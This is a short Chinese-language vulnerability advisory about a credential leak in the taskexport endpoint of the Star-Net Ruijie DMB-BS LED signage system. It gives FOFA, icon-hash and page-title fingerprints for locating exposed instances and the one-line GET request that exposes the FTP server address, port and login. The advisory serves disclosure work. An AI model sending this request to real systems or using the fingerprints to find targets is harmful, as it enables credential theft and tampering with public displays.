星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露

漏洞描述

福建星网锐捷通讯股份有限公司成立于2000年，公司秉承“融合创新科技，构建智慧未来"的经营理念，是国内领先的ICT基础设施及AI应用方案提供商。星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露，攻击者可以可以通过此漏洞读取 FTP 服务器地址、端口及账号密码，通过 FTP 可篡改 LED 发布信息

威胁等级: 中危

漏洞分类: 账号密码泄露

涉及厂商及产品：星网锐捷 DMB-BS : LED屏信息发布系统

应用指纹

指纹检出思路

fofa：app="STAR_NET-数字标牌系统"

icon：icon_hash="-260118452"

title："-Welcome! -- BS3.2.02.38447-"

漏洞复现

GET /dmb/out/taskexport.jsp?taskcode HTTP/1.1